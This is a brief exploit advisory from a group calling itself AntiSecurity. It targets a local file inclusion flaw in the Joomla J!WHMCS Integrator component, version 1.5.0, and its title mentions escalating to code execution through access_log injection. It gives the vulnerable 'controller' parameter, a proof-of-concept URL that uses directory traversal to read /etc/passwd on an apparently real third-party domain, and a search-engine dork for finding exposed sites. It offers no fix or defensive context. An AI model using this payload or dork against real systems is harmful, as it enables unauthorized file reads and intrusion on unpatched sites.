LFI to RCE via access_log injection

Joomla Component J!WHMCS Integrator LFI Vuln


[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability
Software : com_jwhmcs version 1.5.0
Vendor : https://client.gohigheris.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]


[o] PoC
http://www.websites.co.uk/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_jwhmcs"


Comments